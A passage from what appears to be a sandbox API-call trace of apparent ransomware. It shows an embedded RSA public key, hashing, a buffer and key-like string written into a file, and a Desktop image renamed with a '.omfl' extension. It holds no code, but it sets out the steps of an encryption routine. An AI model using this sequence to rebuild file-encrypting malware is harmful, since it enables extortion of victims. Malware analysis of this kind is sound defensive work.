KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.736] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.736] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.736] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.737] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.737] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.737] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.737] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.737] GetLastError () returned 0x0 [0130.737] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.737] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.737] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.737] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.737] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.737] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.737] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x3ff0) returned 0xdd2c688 [0130.737] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.737] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5808 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16cf8 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5850 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16d10 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16d40 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16d58 [0130.737] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0130.738] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16d40 | out: hHeap=0x4970000) returned 1 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16d58 | out: hHeap=0x4970000) returned 1 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16d58 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16d40 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16d58 | out: hHeap=0x4970000) returned 1 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16d40 | out: hHeap=0x4970000) returned 1 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.738] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.738] GetCurrentThreadId () returned 0x618 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d63a0 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.738] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.739] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.739] GetCurrentThreadId () returned 0x618 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.739] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.739] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.739] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.739] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.739] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.739] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16d40 [0130.739] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.739] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8b0 [0130.739] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16d58 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16d28 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16d70 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8a0 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16d40 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16d40 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.740] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.740] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.741] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16d40 | out: hHeap=0x4970000) returned 1 [0130.741] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.741] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16d70 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16d58 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16d28 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16d10 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5850 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.741] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.742] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.742] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.742] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.742] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.742] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.742] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.742] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd2c688*, nNumberOfBytesToWrite=0x3fee, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd2c688*, lpNumberOfBytesWritten=0xe00fb14*=0x3fee, lpOverlapped=0x0) returned 1 [0130.742] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0130.742] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x3ff3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.742] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.742] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.742] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.742] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.742] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.742] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.742] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.743] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.743] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.743] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.743] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.743] CloseHandle (hObject=0x5c8) returned 1 [0130.744] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2d70 [0130.744] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0130.744] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2d70 | out: hHeap=0x4970000) returned 1 [0130.744] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VY4ocALoC.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vy4ocaloc.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VY4ocALoC.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vy4ocaloc.jpg.omfl")) returned 1 [0130.746] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.746] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.746] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.747] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0130.747] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8881ea90, ftCreationTime.dwHighDateTime=0x1d5e4a5, ftLastAccessTime.dwLowDateTime=0x8b935c20, ftLastAccessTime.dwHighDateTime=0x1d5e07a, ftLastWriteTime.dwLowDateTime=0x8b935c20, ftLastWriteTime.dwHighDateTime=0x1d5e07a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_BvYf_mP_z7pO60", cAlternateFileName="_BVYF_~1")) returned 1 [0130.747] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2d70 [0130.747] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2de8 [0130.747] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0130.747] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.747] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5fc8 [0130.747] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 